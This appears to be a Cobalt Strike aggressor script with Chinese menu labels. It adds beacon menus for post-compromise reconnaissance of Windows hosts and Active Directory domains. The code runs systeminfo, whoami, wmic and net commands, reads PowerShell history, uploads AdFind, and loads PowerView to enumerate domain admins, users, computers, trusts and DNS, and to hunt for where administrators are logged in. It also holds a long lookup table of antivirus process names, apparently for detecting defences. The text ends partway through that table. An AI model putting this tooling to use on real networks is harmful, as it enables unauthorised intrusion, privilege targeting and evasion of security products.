menu "☆ 信息收集" {
		
	menu "工作组常用命令" {
		item "systeminfo" {
			blog($1, "\c9=========== systeminfo ==========");
			$bid = $1['@'];
			bshell($bid, "systeminfo");
		}
		item "whoami /all" {
			blog($1, "\c9=========== whoami /all ==========");
			$bid = $1['@'];
			bshell($bid, "whoami /all");
		}
		item "ipconfig /all" {
			blog($1, "\c9=========== ipconfig /all ==========");
			$bid = $1['@'];
			bshell($bid, "ipconfig /all");
		}
		menu "查看网络信息"	{
			item "查看路由表" {
				blog($1, "\c9=========== 查看路由表 ==========");
				$bid = $1['@'];
				bshell($bid, "route print");
			}
			item "查看 ARP 缓存" {
				blog($1, "\c9=========== 查看 ARP 缓存 ==========");
				$bid = $1['@'];
				bshell($bid, "arp -A");
			}
			item "查看 Hosts 文件" {
				blog($1, "\c9=========== 查看 Hosts 文件 ==========");
				bshell($1, "type C:\\Windows\\System32\\drivers\\etc\\hosts");
			}
			item "查看 DNS 缓存" {
				blog($1, "\c9=========== 查看 DNS 缓存 ==========");
				bshell($1, "ipconfig /displaydns");
			}
			item "Tracert 路由跟踪" {
				blog($1, "\c9=========== Tracert 路由跟踪 ==========");
				prompt_text("需要跟踪的ip或域名：", "", lambda({ bshell(@ids, "tracert $1");  }, @ids => $1));
			}		
		}	
		item "查看用户信息" {
			blog($1, "\c9=========== 查看用户信息 ==========");
			$bid = $1['@'];
			bshell($bid, "net user");
		}		
		item "查看安装程序和版本信息" {
			blog($1, "\c9=========== 查看安装程序和版本信息 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic product get name,version");
		}
		item "查看安装的补丁" {
			blog($1, "\c9=========== 查看安装的补丁 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic qfe get Caption,Description,HotFixID,InstalledOn");
		}
		item "查看运行的进程及路径" {
			blog($1, "\c9=========== 查看运行的进程及路径 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic process get caption,executablepath,commandline");
		}
		item "查看进程详细信息" {
			blog($1, "\c9=========== 查看进程详细信息 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic process get caption,commandline,processid /value");
		}
		item "查看服务" {
			blog($1, "\c9=========== 查看服务 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic service list brief");
		}
		item "查看防火墙配置" {
			blog($1, "\c9=========== 查看防火墙配置 ==========");
			$bid = $1['@'];
			bshell($bid, "netsh firewall show config");
		}
		item "查看计划任务" {
			blog($1, "\c9=========== 查看计划任务 ==========");
			$bid = $1['@'];
			bshell($bid, "schtasks.exe");
		}
		item "查看计划任务详情" {
			blog($1, "\c9=========== 查看计划任务详情 ==========");
			$bid = $1['@'];
			bshell($bid, "schtasks /query /fo LIST /v");
		}
		item "查看启动程序信息" {
			blog($1, "\c9=========== 查看启动程序信息 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic startup get command,caption");
		}
		item "查看在线用户" {
			blog($1, "\c9=========== 查看在线用户 ==========");
			$bid = $1['@'];
			bshell($bid, "query user || qwinsta");
		}
		item "查看开机时间" {
			blog($1, "\c9=========== 查看开机时间 ==========");
			$bid = $1['@'];
			bshell($bid, "net statistics workstation");
		}
		item "查看powershell v5历史命令" {
			blog($1, "\c9=========== 查看powershell v5历史命令 ==========");
			$bid = $1['@'];
			bshell($bid, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt");
		}
		item "查看最近使用的项目" {
			blog($1, "\c9=========== 查看最近使用的项目 ==========");
			$bid = $1['@'];
			bshell($bid, "dir %APPDATA%\\Microsoft\\Windows\\Recent");
		}
		item "查看SMB指向路径" {
			blog($1, "\c9=========== 查看SMB指向路径 ==========");
			$bid = $1['@'];
			bshell($bid, "wmic share get name,path");
		}
	}

	menu "域环境常用命令" {
		menu "AdFind (查询域内信息)" {
			item "上传AdFind" {
				blog($1, "\c9=========== 上传AdFind ==========");
				$bid = $1;
				$dialog = dialog("上传AdFind", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &AdFind_upload);
				dialog_description($dialog,"AdFind用于查询域内信息。项目地址：http://www.joeware.net/freetools/tools/adfind/index.htm");
				drow_text($dialog, "UploadPath",  "上传路径: ");
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
			}
			sub AdFind_upload {
				bcd($bid, $3['UploadPath']);
				bupload($bid, script_resource("/scripts/InfoCollect/AdFind.exe"));
			}
			item "列出域控制器名称" {
				blog($1, "\c9=========== 列出域控制器名称 ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -sc dclist");
			}
			item "查询当前域中在线的计算机" {
				blog($1, "\c9=========== 查询当前域中在线的计算机 ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -sc computers_active");
			}
			item "查询当前域中在线的计算机(只显示名称和操作系统)" {
				blog($1, "\c9=========== 查询当前域中在线的计算机(只显示名称和操作系统) ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -sc computers_active name operatingSystem");
			}
			item "查询当前域中所有计算机" {
				blog($1, "\c9=========== 查询当前域中所有计算机 ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -f \"objectcategory=computer\"");
			}
			item "查询当前域中所有计算机(只显示名称和操作系统)" {
				blog($1, "\c9=========== 查询当前域中所有计算机(只显示名称和操作系统) ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -f \"objectcategory=computer\" name operatingSystem");
			}
			item "查询域内所有用户" {
				blog($1, "\c9=========== 查询域内所有用户 ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -users name");
			}
			item "查询所有GPO" {
				blog($1, "\c9=========== 查询所有GPO ==========");
				$bid = $1['@'];
				bshell($bid, "AdFind.exe -sc gpodmp");
			}
			item "删除AdFind" {
				blog($1, "\c9=========== 删除AdFind ==========");
				$bid = $1['@'];
				bshell($bid, "del /f /s /q AdFind.exe");
			}
		}
		item "查看域信息"{
			blog($1, "\c9=========== 查看域信息 ==========");
			bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
			bpowerpick($1, "Get-NetForest");
		}
		menu "查找域控制器"{
			item "查看主域控制器" {
				blog($1, "\c9=========== 查看主域控制器 ==========");
				$bid = $1['@'];
				bshell($bid, "netdom query pdc");
			}
			item "查看域控列表" {
				blog($1, "\c9=========== 查看域控列表 ==========");
				$bid = $1['@'];
				bshell($bid, "net group \"Domain Controllers\" /domain");
			}		
			item "获取域控详细信息" {
				blog($1, "\c9=========== 获取域控详细信息 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetDomainController");
			}
			item "Net time 查找域控" {
				blog($1, "\c9=========== Net time 查找域控 ==========");
				bshell($1, "net time /domain");
			}
			item "Nslookup 查找域控" {
				blog($1, "\c9=========== Nslookup 查找域控 ==========");
				prompt_text("输入域名：", "xstark.sec", lambda({ bshell(@ids, "Nslookup -type=SRV _ldap._tcp $1"); }, @ids => $1));
			}
			item "Nltest 查找域控" {
				blog($1, "\c9=========== Nltest 查找域控 ==========");
				prompt_text("输入域名：", "xstark.sec", lambda({ bshell(@ids, "nltest /DCLIST:$1"); }, @ids => $1));
			}
		}

		menu "查询域管理员" {
			item "查找域管理员" {
				blog($1, "\c9=========== 查找域管理员 ==========");
				$bid = $1['@'];
				bshell($bid, 'net group "domain admins" /domain');
			}
			item "查找企业管理员" {
				blog($1, "\c9=========== 查找企业管理员 ==========");
				$bid = $1['@'];
				bshell($bid, 'net group "enterprise admins" /domain');
			}
			item "查看登录本机的域管" {
				blog($1, "\c9=========== 查看登录本机的域管 ==========");
				$bid = $1['@'];
				bshell($bid, "net localgroup administrators /domain");
			}
		}

		menu "查询域内用户" {
			item "查询指定域用户信息" {
				blog($1, "\c9=========== 查询指定域用户信息 ==========");
				prompt_text("输入域用户名", "", lambda({bshell(@bid, "net user $1 /domain");}, @bid => $bid));
			}
			item "查询当前域用户 SID" {
				blog($1, "\c9=========== 查询域用户 SID ==========");
				$bid = $1['@'];
				bshell($bid, "whoami /user");
			}
			item "查看所有域用户" {
				blog($1, "\c9=========== 查看所有域用户 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/PowerView.ps1"));
				bpowerpick($1, "Get-NetUser | select name");
			}
			item "查看域内所有用户组列表" {
				blog($1, "\c9=========== 查看域内所有用户组列表 ==========");
				$bid = $1['@'];
				bshell($bid, "net group /domain");
			}
			item "统计域内用户数量" {
				blog($1, "\c9=========== 统计域内用户数量 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/PowerView.ps1"));
				bpowerpick($1, "Get-NetUser | select name | measure | findstr Count");
			}
			item "将域用户导出到文件" {
				blog($1, "\c9=========== 将域用户导出到文件 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/PowerView.ps1"));
				bpowerpick($1, "Get-NetUser | select name > domain_user.txt");
				blog($1, "将域内用户详细信息导出到当前目录下的 domain_user.txt 文件中!");
			}
			item "将域用户详细信息导出到文件" {
				blog($1, "\c9=========== 将域用户详细信息导出到文件 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/PowerView.ps1"));
				bpowerpick($1, "Get-NetUser > domain_user_info.txt");
				blog($1, "将域内用户导出到当前目录下的 domain_user_info.txt 文件中!");
			}
			item "查询指定域用户在哪些域组中" {
				blog($1, "\c9=========== 查询指定域用户在哪些域组中 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/PowerView.ps1"));
				prompt_text("输入要查询的域用户：", "", lambda({ bpowerpick(@ids, "Get-NetGroup -UserName $1"); }, @ids => $1));
			}				
		}
		menu "查询域内主机"{
			item "查看所有域成员计算机列表" {
				blog($1, "\c9=========== 查看所有域成员计算机列表 ==========");
				$bid = $1['@'];
				bshell($bid, "net group \"domain computers\" /domain");
			}
			item "查看域内所有计算机" {
				blog($1, "\c9=========== 查看域内所有计算机 ==========");
				prompt_text("输入主机名", "", lambda({bshell(@bid, "net view /domain:$1");}, @bid => $bid));
			}		
			item "统计域内主机数量" {
				blog($1, "\c9=========== 统计域内主机数量 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetComputer | measure | findstr Count");
			}
			item "查看域内主机" {
				blog($1, "\c9=========== 查看域内主机 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetComputer");
			}
			item "将域主机导出到文件" {
				blog($1, "\c9=========== 将域主机导出到文件 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetComputer > domain_computer.txt");
				blog($1, "将域内主机导出到当前目录下的 domain_computer.txt 文件中!");
			}
			item "查询带指定字符的主机" {
				blog($1, "\c9=========== 查询带指定字符的主机 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				prompt_text("输入要查询的字符：", "admin", lambda({ bpowerpick(@ids, "Get-NetComputer \*$1\*"); }, @ids => $1));
			}
		}
		menu "查询域内的组"{
			item "查询域内的组名(所有组)" {
				blog($1, "\c9=========== 查询域内的组名(所有组) ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetGroup");
			}
			item "查询域内的组名(全局组、通用组)" {
				blog($1, "\c9=========== 查询域内的组名(全局组、通用组) ==========");
				bshell($1, "net group /domain");
			}
			item "将域组导出到文件" {
				blog($1, "\c9=========== 将域组导出到文件 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				bpowerpick($1, "Get-NetGroup > domain_group.txt");
				blog($1, "将域内的组导出到当前目录下的 domain_group.txt 文件中!");
			}
			item "查询带指定字符的域组" {
				blog($1, "\c9=========== 查询带指定字符的域组 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				prompt_text("输入要查询的字符：", "admin", lambda({ bpowerpick(@ids, "Get-NetGroup \*$1\*"); }, @ids => $1));
			}
			item "查询指定域用户在哪些域组中" {
				blog($1, "\c9=========== 查询指定域用户在哪些域组中 ==========");
				bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
				prompt_text("输入要查询的域用户：", "", lambda({ bpowerpick(@ids, "Get-NetGroup -UserName $1"); }, @ids => $1));
			}
			item "查询指定组内含有哪些用户" {
				blog($1, "\c9=========== 查询指定组内含有哪些用户 ==========");
				prompt_text("输入要查询的组名：", "domain admins", lambda({ bpowerpick(@ids, "net group \"$1\" /domain"); }, @ids => $1));
			}
		}				
		menu "查找域用户或域主机（域管）" {
			item "查询指定用户当前登录的主机" {
				blog($1, "\c9=========== 查询指定用户当前登录的主机 ==========");
				bpowershell_import($1, script_resource("/powershell/PowerView.ps1"));
				prompt_text("输入指定用户：", "administrator", lambda({ bpowerpick(@ids,"Invoke-UserHunter -UserName \"$1\"");}, @ids => $1));
			}
			item "查询指定主机当前登录的用户" {
				blog($1, "\c9=========== 查询指定主机当前登录的用户 ==========");
				bpowershell_import($1, script_resource("/powershell/PowerView.ps1"));
				prompt_text("输入指定主机：", "win7", lambda({ bpowerpick(@ids,"Invoke-UserHunter -ComputerName \"$1\"");}, @ids => $1));
			}
		}
		menu "DnsQuery 查询（域控）" {
			item "查询主域控" {
				blog($1, "\c9=========== 查询主域控 ==========");
				bshell($1, "netdom query pdc");
			}
			item "查询域控" {
				blog($1, "\c9=========== 查询域控 ==========");
				bshell($1, "dsquery server");
			}
			item "查询域用户" {
				blog($1, "\c9=========== 查询域用户 ==========");
				bshell($1, "dsquery user");
			}
			item "查询域主机" {
				blog($1, "\c9=========== 查询域主机 ==========");
				bshell($1, "dsquery computer");
			}
			item "查询域组" {
				blog($1, "\c9=========== 查询域组 ==========");
				bshell($1, "dsquery group");
			}
			item "查询组织单位" {
				blog($1, "\c9=========== 查询组织单位 ==========");
				bshell($1, "dsquery ou");
			}
			item "查询站点" {
				blog($1, "\c9=========== 查询站点 ==========");
				bshell($1, "dsquery site");
			}
			item "查询分区" {
				blog($1, "\c9=========== 查询分区 ==========");
				bshell($1, "dsquery partition");
			}
		}

		item "查看当前登录域" {
			blog($1, "\c9=========== 查看当前登录域 ==========");
			$bid = $1['@'];
			bshell($bid, "net config workstation");
		}
		item "查询域内组织单位" {
			blog($1, "\c9=========== 查询域内的组织单位 ==========");
			bpowershell_import($1, script_resource("/scripts/InfoCollect/Powerview.ps1"));
			bpowerpick($1, "Get-NetOU");
		}		
		item "获取域信任关系" {
			blog($1, "\c9=========== 获取域信任关系 ==========");
			$bid = $1['@'];
			bshell($bid, "nltest /domain_trusts");
		}	
		item "获取域密码策略" {
			blog($1, "\c9=========== 获取域密码策略 ==========");
			$bid = $1['@'];
			bshell($bid, "net accounts /domain");
		}
		item "查询域内 DNS 记录" {
			blog($1, "\c9=========== 查询域内 DNS 记录 ==========");
	        $bid = $1['@'];
	        $Dialog = dialog("查询域内DNS记录",%(domain => "xstark.sec",bid => $bid),&query_dns);
	        dialog_description($Dialog, "查询域内的DNS记录");
	        drow_text($Dialog, "domain", "域名: ");
	        dbutton_action($Dialog, "确定");
	        dialog_show($Dialog);
		}
		sub query_dns{
			bpowershell_import($bid, script_resource("/scripts/InfoCollect/Powerview.ps1"));
			bpowerpick($bid, "Get-DNSRecord  -ZoneName $3['domain'] | select name,data");
			bpowerpick($bid, "Get-DNSRecord  -ZoneName $3['domain'] | select name,data > dns.txt");
		}
	}
	
	separator();
	menu "主机杀软信息查询" {
		item "AvSearch（WMIC）" {
			blog($1, "\c9=========== AvSearch（杀软信息） ==========");
			bshell($1,"wmic /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName,productState,pathToSignedProductExe | findstr /V /B /C:displayName || echo No Antivirus installed");
		}

		item "AntiVirusCheck（状态栏）" {
			%sr = %(
				"360tray.exe" => "360安全卫士-实时保护",
				"360safe.exe": => "360安全卫士-主程序",
				"ZhuDongFangYu.exe" => "360安全卫士-主动防御",
				"360sd.exe" => "360杀毒",
				"a2guard.exe" => "a-squared杀毒",
				"ad-watch.exe" => "Lavasoft杀毒",
				"cleaner8.exe" => "The Cleaner杀毒",
				"vba32lder.exe" => "vb32杀毒",
				"MongoosaGUI.exe" => "Mongoosa杀毒",
				"CorantiControlCenter32.exe" => "Coranti2012杀毒",
				"F-PROT.exe" => "F-Prot AntiVirus",
				"CMCTrayIcon.exe" => "CMC杀毒",
				"K7TSecurity.exe" => "K7杀毒",
				"UnThreat.exe" => "UnThreat杀毒",
				"CKSoftShiedAntivirus4.exe" => "Shield Antivirus杀毒",
				"AVWatchService.exe" => "VIRUSfighter杀毒",
				"ArcaTasksService.exe" => "ArcaVir杀毒",
				"iptray.exe" => "Immunet杀毒",
				"PSafeSysTray.exe" => "PSafe杀毒",
				"nspupsvc.exe" => "nProtect杀毒",
				"SpywareTerminatorShield.exe" => "SpywareTerminator反间谍软件",
				"BKavService.exe" => "Bkav杀毒",
				"MsMpEng.exe" => "Windows Defender",
				"SBAMSvc.exe" => "VIPRE",
				"ccSvcHst.exe" => "Norton杀毒",
				"f-secure.exe" => "冰岛",
				"avp.exe" => "Kaspersky",
				"KvMonXP.exe" => "江民杀毒",
				"RavMonD.exe" => "瑞星杀毒",
				"Mcshield.exe" => "McAfee",
				"Tbmon.exe" => "McAfee",
				"Frameworkservice.exe" => "McAfee",
				"egui.exe" => "ESET NOD32",
				"ekrn.exe" => "ESET NOD32",
				"eguiProxy.exe" => "ESET NOD32",
				"kxetray.exe" => "金山毒霸",
				"knsdtray.exe" => "可牛杀毒",
				"TMBMSRV.exe" => "趋势杀毒",
				"avcenter.exe" => "Avira(小红伞)",
				"avguard.exe" => "Avira(小红伞)",
				"avgnt.exe" => "Avira(小红伞)",
				"sched.exe" => "Avira(小红伞)",
				"ashDisp.exe" => "Avast网络安全",
				"rtvscan.exe" => "诺顿杀毒",
				"ccapp.exe" => "SymantecNorton",
				"NPFMntor.exe" => "Norton杀毒软件",
				"ccSetMgr.exe" => "赛门铁克",
				"ccRegVfy.exe" => "Norton杀毒软件",
				"ksafe.exe" => "金山卫士",
				"QQPCRTP.exe" => "QQ电脑管家",
				"avgwdsvc.exe" => "AVG杀毒",
				"QUHLPSVC.exe" => "QUICK HEAL杀毒",
				"mssecess.exe" => "微软杀毒",
				"SavProgress.exe" => "Sophos杀毒",
				"SophosUI.exe" => "Sophos杀毒",
				"SophosFS.exe" => "Sophos杀毒",
				"SophosHealth.exe" => "Sophos杀毒",
				"SophosSafestore64.exe" => "Sophos杀毒",
				"SophosCleanM.exe" => "Sophos杀毒",
				"fsavgui.exe" => "F-Secure杀毒",
				"vsserv.exe" => "比特梵德",
				"remupd.exe" => "熊猫卫士",
				"FortiTray.exe" => "飞塔",
				"safedog.exe" => "安全狗",
				"parmor.exe" => "木马克星",
				"Iparmor.exe.exe" => "木马克星",
				"beikesan.exe" => "贝壳云安全",
				"KSWebShield.exe" => "金山网盾",
				"TrojanHunter.exe" => "木马猎手",
				"GG.exe" => "巨盾网游安全盾",
				"adam.exe" => "绿鹰安全精灵",
				"AST.exe" => "超级巡警",
				"ananwidget.exe" => "墨者安全专家",
				"AVK.exe" => "AntiVirusKit",
				"avg.exe" => "AVG Anti-Virus",
				"spidernt.exe" => "Dr.web",
				"avgaurd.exe" => "Avira Antivir",
				"vsmon.exe" => "Zone Alarm",
				"cpf.exe" => "Comodo",
				"outpost.exe" => "Outpost Firewall",
				"rfwmain.exe" => "瑞星防火墙",
				"kpfwtray.exe" => "金山网镖",
				"FYFireWall.exe" => "风云防火墙",
				"MPMon.exe" => "微点主动防御",
				"pfw.exe" => "天网防火墙",
				"BaiduSdSvc.exe" => "百度杀毒-服务进程",
				"BaiduSdTray.exe" => "百度杀毒-托盘进程",
				"BaiduSd.exe" => "百度杀毒-主程序",
				"SafeDogGuardCenter.exe" => "安全狗",
				"safedogupdatecenter.exe" => "安全狗",
				"safedogguardcenter.exe" => "安全狗",
				"SafeDogSiteIIS.exe" => "安全狗",
				"SafeDogTray.exe" => "安全狗",
				"SafeDogServerUI.exe" => "安全狗",
				"D_Safe_Manage.exe" => "D盾",
				"d_manage.exe" => "D盾",
				"yunsuo_agent_service.exe" => "云锁",
				"yunsuo_agent_daemon.exe" => "云锁",
				"HwsPanel.exe" => "护卫神",
				"hws_ui.exe" => "护卫神",
				"hws.exe" => "护卫神",
				"hwsd.exe" => "护卫神",
				"HipsTray.exe" => "火绒",
				"HipsDaemon.exe" => "火绒",
				"wsctrl.exe" => "火绒",
				"usysdiag.exe" => "火绒",
				"SPHINX.exe" => "SPHINX防火墙",
				"bddownloader.exe" => "百度卫士",
				"baiduansvx.exe" => "百度卫士-主进程",
				"AvastUI.exe" => "Avast!5主程序",
				"emet_agent.exe" => "EMET",
				"emet_service.exe" => "EMET",
				"firesvc.exe" => "McAfee",
				"firetray.exe" => "McAfee",
				"hipsvc.exe" => "McAfee",
				"mfevtps.exe" => "McAfee",
				"mcafeefire.exe" => "McAfee",
				"scan32.exe" => "McAfee",
				"shstat.exe" => "McAfee",
				"vstskmgr.exe" => "McAfee",
				"engineserver.exe" => "McAfee",
				"mfeann.exe" => "McAfee",
				"mcscript.exe" => "McAfee",
				"updaterui.exe" => "McAfee",
				"udaterui.exe" => "McAfee",
				"naprdmgr.exe" => "McAfee",
				"cleanup.exe" => "McAfee",
				"cmdagent.exe" => "McAfee",
				"frminst.exe" => "McAfee",
				"mcscript_inuse.exe" => "McAfee",
				"mctray.exe" => "McAfee",
				"_avp32.exe" => "卡巴斯基",
				"_avpcc.exe" => "卡巴斯基",
				"_avpm.exe" => "卡巴斯基",
				"aAvgApi.exe" => "AVG",
				"ackwin32.exe" => "已知杀软进程,名称暂未收录",
				"alertsvc.exe" => "Norton AntiVirus",
				"alogserv.exe" => "McAfee VirusScan",
				"anti-trojan.exe" => "Anti-Trojan Elite",
				"arr.exe" => "Application Request Route",
				"atguard.exe" => "AntiVir",
				"atupdater.exe" => "已知杀软进程,名称暂未收录",
				"atwatch.exe" => "Mustek",
				"au.exe" => "NSIS",
				"aupdate.exe" => "Symantec",
				"auto-protect.nav80try.exe" => "已知杀软进程,名称暂未收录",
				"autodown.exe" => "AntiVirus AutoUpdater",
				"avconsol.exe" => "McAfee",
				"avgcc32.exe" => "AVG",
				"avgctrl.exe" => "AVG",
				"avgemc.exe" => "AVG",
				"avgrsx.exe" => "AVG",
				"avgserv.exe" => "AVG",
				"avgserv9.exe" => "AVG",
				"avgw.exe" => "AVG",
				"avkpop.exe" => "G DATA SOFTWARE AG",
				"avkserv.exe" => "G DATA SOFTWARE AG",
				"avkservice.exe" => "G DATA SOFTWARE AG",
				"avkwctl9.exe" => "G DATA SOFTWARE AG",
				"avltmain.exe" => "Panda Software Aplication",
				"avnt.exe" => "H+BEDV Datentechnik GmbH",
				"avp32.exe" => "Kaspersky Anti-Virus",
				"avpcc.exe" => " Kaspersky AntiVirus",
				"avpdos32.exe" => " Kaspersky AntiVirus",
				"avpm.exe" => " Kaspersky AntiVirus",
				"avptc32.exe" => " Kaspersky AntiVirus",
				"avpupd.exe" => " Kaspersky AntiVirus",
				"avsynmgr.exe" => "McAfee",
				"avwin.exe" => " H+BEDV",
				"bargains.exe" => "Exact Advertising SpyWare",
				"beagle.exe" => "Avast",
				"blackd.exe" => "BlackICE",
				"blackice.exe" => "BlackICE",
				"blink.exe" => "micromedia",
				"blss.exe" => "CBlaster",
				"bootwarn.exe" => "Symantec",
				"bpc.exe" => "Grokster",
				"brasil.exe" => "Exact Advertising",
				"ccevtmgr.exe" => "Norton Internet Security",
				"cdp.exe" => "CyberLink Corp.",
				"cfd.exe" => "Motive Communications",
				"cfgwiz.exe" => " Norton AntiVirus",
				"claw95.exe" => "已知杀软进程,名称暂未收录",
				"claw95cf.exe" => "已知杀软进程,名称暂未收录",
				"clean.exe" => "windows流氓软件清理大师",
				"cleaner.exe" => "windows流氓软件清理大师",
				"cleaner3.exe" => "windows流氓软件清理大师",
				"cleanpc.exe" => "windows流氓软件清理大师",
				"cpd.exe" => "McAfee",
				"ctrl.exe" => "已知杀软进程,名称暂未收录",
				"cv.exe" => "已知杀软进程,名称暂未收录",
				"defalert.exe" => "Symantec",
				"defscangui.exe" => "Symantec",
				"defwatch.exe" => "Norton Antivirus",
				"doors.exe" => "已知杀软进程,名称暂未收录",
				"dpf.exe" => "已知杀软进程,名称暂未收录",
				"dpps2.exe" => "PanicWare",
				"dssagent.exe" => "Broderbund",
				"ecengine.exe" => "已知杀软进程,名称暂未收录",
				"emsw.exe" => "Alset Inc",
				"ent.exe" => "已知杀软进程,名称暂未收录",
				"espwatch.exe" => "已知杀软进程,名称暂未收录",
				"ethereal.exe" => "RationalClearCase",
				"exe.avxw.exe" => "已知杀软进程,名称暂未收录",
				"expert.exe" => "已知杀软进程,名称暂未收录",
				"f-prot95.exe" => "已知杀软进程,名称暂未收录",
				"fameh32.exe" => "F-Secure",
				"fast.exe" => " FastUsr",
				"fch32.exe" => "F-Secure",
				"fih32.exe" => "F-Secure",
				"findviru.exe" => "F-Secure",
				"firewall.exe" => "AshampooSoftware",
				"fnrb32.exe" => "F-Secure",
				"fp-win.exe" => " F-Prot Antivirus OnDemand",
				"fsaa.exe" => "F-Secure",
				"fsav.exe" => "F-Secure",
				"fsav32.exe" => "F-Secure",
				"fsav530stbyb.exe" => "F-Secure",
				"fsav530wtbyb.exe" => "F-Secure",
				"fsav95.exe" => "F-Secure",
				"fsgk32.exe" => "F-Secure",
				"fsm32.exe" => "F-Secure",
				"fsma32.exe" => "F-Secure",
				"fsmb32.exe" => "F-Secure",
				"gbmenu.exe" => "已知杀软进程,名称暂未收录",
				"guard.exe" => "ewido",
				"guarddog.exe" => "ewido",
				"htlog.exe" => "已知杀软进程,名称暂未收录",
				"htpatch.exe" => "Silicon Integrated Systems Corporation",
				"hwpe.exe" => "已知杀软进程,名称暂未收录",
				"iamapp.exe" => "Symantec",
				"iamserv.exe" => "Symantec",
				"iamstats.exe" => "Symantec",
				"iedriver.exe" => " Urlblaze.com",
				"iface.exe" => "Panda Antivirus Module",
				"infus.exe" => "Infus Dialer",
				"infwin.exe" => "Msviewparasite",
				"intdel.exe" => "Inet Delivery",
				"intren.exe" => "已知杀软进程,名称暂未收录",
				"jammer.exe" => "已知杀软进程,名称暂未收录",
				"kavpf.exe" => "Kapersky",
				"kazza.exe" => "Kapersky",
				"keenvalue.exe" => "EUNIVERSE INC",
				"launcher.exe" => "Intercort Systems",
				"ldpro.exe" => "已知杀软进程,名称暂未收录",
				"ldscan.exe" => "Windows Trojans Inspector",
				"localnet.exe" => "已知杀软进程,名称暂未收录",
				"luall.exe" => "Symantec",
				"luau.exe" => "Symantec",
				"lucomserver.exe" => "Norton",
				"mcagent.exe" => "McAfee",
				"mcmnhdlr.exe" => "McAfee",
				"mctool.exe" => "McAfee",
				"mcupdate.exe" => "McAfee",
				"mcvsrte.exe" => "McAfee",
				"mcvsshld.exe" => "McAfee",
				"mfin32.exe" => "MyFreeInternetUpdate",
				"mfw2en.exe" => "MyFreeInternetUpdate",
				"mfweng3.02d30.exe" => "MyFreeInternetUpdate",
				"mgavrtcl.exe" => "McAfee",
				"mgavrte.exe" => "McAfee",
				"mghtml.exe" => "McAfee",
				"mgui.exe" => "BullGuard",
				"minilog.exe" => "Zone Labs Inc",
				"mmod.exe" => "EzulaInc",
				"mostat.exe" => "WurldMediaInc",
				"mpfagent.exe" => "McAfee",
				"mpfservice.exe" => "McAfee",
				"mpftray.exe" => "McAfee",
				"mscache.exe" => "Integrated Search Technologies Spyware",
				"mscman.exe" => "OdysseusMarketingInc",
				"msmgt.exe" => "Total Velocity Spyware",
				"msvxd.exe" => "W32/Datom-A",
				"mwatch.exe" => "已知杀软进程,名称暂未收录",
				"nav.exe" => "Reuters Limited",
				"navapsvc.exe" => "Norton AntiVirus",
				"navapw32.exe" => "Norton AntiVirus",
				"navw32.exe" => "Norton Antivirus",
				"ndd32.exe" => "诺顿磁盘医生",
				"neowatchlog.exe" => "已知杀软进程,名称暂未收录",
				"netutils.exe" => "已知杀软进程,名称暂未收录",
				"nisserv.exe" => "Norton",
				"nisum.exe" => "Norton",
				"nmain.exe" => "Norton",
				"nod32.exe" => "ESET Smart Security",
				"norton_internet_secu_3.0_407.exe" => "已知杀软进程,名称暂未收录",
				"notstart.exe" => "已知杀软进程,名称暂未收录",
				"nprotect.exe" => "Symantec",
				"npscheck.exe" => "Norton",
				"npssvc.exe" => "Norton",
				"ntrtscan.exe" => "趋势反病毒应用程序",
				"nui.exe" => "已知杀软进程,名称暂未收录",
				"otfix.exe" => "已知杀软进程,名称暂未收录",
				"outpostinstall.exe" => "Outpost",
				"patch.exe" => "趋势科技",
				"pavw.exe" => "已知杀软进程,名称暂未收录",
				"pcscan.exe" => "趋势科技",
				"pdsetup.exe" => "已知杀软进程,名称暂未收录",
				"persfw.exe" => "Tiny Personal Firewall",
				"pgmonitr.exe" => "PromulGate SpyWare",
				"pingscan.exe" => "已知杀软进程,名称暂未收录",
				"platin.exe" => "已知杀软进程,名称暂未收录",
				"pop3trap.exe" => "PC-cillin",
				"poproxy.exe" => "NortonAntiVirus",
				"popscan.exe" => "已知杀软进程,名称暂未收录",
				"powerscan.exe" => "Integrated Search Technologies",
				"ppinupdt.exe" => "已知杀软进程,名称暂未收录",
				"pptbc.exe" => "已知杀软进程,名称暂未收录",
				"ppvstop.exe" => "已知杀软进程,名称暂未收录",
				"prizesurfer.exe" => "Prizesurfer",
				"prmt.exe" => "OpiStat",
				"prmvr.exe" => "Adtomi",
				"processmonitor.exe" => "Sysinternals",
				"proport.exe" => "已知杀软进程,名称暂未收录",
				"protectx.exe" => "ProtectX",
